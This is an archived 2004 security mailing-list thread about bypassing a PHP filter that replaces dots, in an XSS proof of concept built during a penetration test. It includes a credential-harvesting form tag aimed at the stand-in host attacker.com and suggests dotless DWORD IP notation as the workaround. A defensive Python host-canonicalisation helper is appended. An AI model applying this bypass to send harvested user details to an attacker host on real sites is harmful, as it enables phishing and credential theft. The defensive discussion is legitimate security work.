WebApp Sec mailing list archives
RE: Fullstop Substitution in XSS
From: "Harry Metcalfe" <harry () slaptop com>
Date: Tue, 1 Jun 2004 03:13:46 +0100
Hiya,

Yes: Don't use a . in the target. You can specify an IP address in DWORD form, which has no periods. See the following page for a good description:

http://www.tcp-ip.nu/tcp-ip/subpages/dotlessip/

It should be noted that this will not work in all browsers, and thus if the client's browser does not support this IP address notation, they will be invulnerable. Many browsers do support it though - Firefox being among them. I think IE5 does also. I have IE6 here and it doesn't work with that.

HTH,
Arta

-----Original Message-----
From: Calum Power [mailto:enune () fribble net]
Sent: 29 May 2004 05:49
To: webappsec () securityfocus com
Subject: Fullstop Substitution in XSS

Hi all,

As a part of a recent Pen-Test, I came across an XSS vulnerability. The PHP script that has this vuln is filtering fullstops (.) and replacing them with underscores (_).

Now, I'm trying to write a Proof-of-Concept, in which a (convincing) form would be outputted that could 'harvest' user details and send them to an attacker's webserver. My problem lies in the output of the form tags. Any:

<form target="http://attacker.com/path/to/script">

is of course being filtered into:

<form target="http://attacker_com/path/to/script">

Has anyone else had a similar problem? I've tried using hex and unicode encoding, to no avail (they get decoded before the filtering, obviously).

Any help would be appreciated.

Cheers,
Calum

--
Calum Power
Cultural Jammer
Security Enthusiast
Hopeless Cynic
enune () fribble net
http://www.fribble.net
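The thread's point for defenders is that stripping "." is a denylist on one character, and a host written as a single 32-bit integer (the DWORD / dotless form Harry mentions) contains no dot at all. The following added example (not from the thread) is a hypothetical validation helper that canonicalises numeric hosts to dotted-quad before any allowlist decision, so the dotless form is recognised rather than waved through; the function names and the sample allowlist are assumptions.

```python
import ipaddress
import re
from typing import Optional
from urllib.parse import urlsplit

# Matches a host that is a single number: hex (0x...), octal (leading 0) or
# decimal. Such a host has no "." for a dot-stripping filter to catch.
_DOTLESS = re.compile(r"^(0x[0-9a-f]+|0[0-7]*|[1-9][0-9]*)$", re.IGNORECASE)


def _parse_dotless(h: str) -> int:
    """Interpret a dotless numeric host the way browsers that accept it do."""
    if h.lower().startswith("0x"):
        return int(h[2:], 16)
    if len(h) > 1 and h.startswith("0"):
        return int(h, 8)
    return int(h, 10)


def canonical_host(host: str) -> Optional[str]:
    """Return a numeric host as dotted-quad (e.g. '3232235777' -> '192.168.1.1').

    Non-numeric hosts are returned lower-cased and unchanged. Returns None when
    the host is numeric but does not fit in 32 bits, i.e. it is not a valid IPv4.
    """
    h = host.strip().rstrip(".").lower()
    if not _DOTLESS.match(h):
        return h
    n = _parse_dotless(h)
    if n > 0xFFFFFFFF:
        return None
    return str(ipaddress.IPv4Address(n))


def url_host_allowed(url: str, allowed_hosts: set) -> bool:
    """Allowlist check that survives the dotless-IP notation.

    Every host is canonicalised first, and bare IP literals are rejected outright
    because a legitimate form target here is expected to be a named host.
    """
    host = urlsplit(url).hostname
    if host is None:
        return False
    canon = canonical_host(host)
    if canon is None:
        return False
    try:
        ipaddress.IPv4Address(canon)  # any IP literal, dotted or not, is refused
        return False
    except ValueError:
        return canon in allowed_hosts
```

Canonicalisation makes the decision about the host the browser will actually contact; the output itself should still be contextually encoded rather than patched with character substitution.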